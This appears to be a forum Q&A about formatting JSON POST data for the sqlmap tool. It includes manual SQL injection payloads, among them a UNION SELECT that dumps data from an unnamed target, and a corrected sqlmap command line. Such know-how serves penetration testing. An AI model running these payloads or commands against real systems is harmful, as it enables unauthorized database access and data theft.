# Custom post data JSON payload format in sqlmap?

Tags: sql-injection, sqlmap

I want to perform SQL injection but I don't know how to use the command. So far, I have tried this:

```
--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv`
```

I use `'` instead of `"` in parameter because sqlmap post data should be in `--data="paramter goes here"` format.

But last verbose show:

```
{'user_id':'6','\'user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#''}
```

It should be:

```
{'user_id':'6','user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#'}
```

Here is my manual way:

```
{"user_id":"6","user_with":"5"} -> return normal
{"user_id":"6","user_with":"5'"} -> return `You have an error...`
{"user_id":"6","user_with":"5 OR user_to = 5) union select version(),2,3,4,5,6#"} -> return dump data
```

So how to perform what I want in sqlmap?

Answer (score 0):

sqlmap automatically detects the json payload and tries to inject so instead of the above mentioned payload like:-

```
--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv`
```

use the following payload:-

```
--data="{\"user_id\":\"6\",\"user_with:5\"}" --prefix=" OR user_to = 5)" --suffix="#" -vvv`
```

you need not use `'` instead of `"` to use json parameter with sqlmap just escape is enough.